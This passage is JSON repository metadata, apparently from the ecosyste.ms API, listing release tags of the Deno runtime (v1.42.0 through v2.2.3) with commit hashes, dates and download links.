land/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden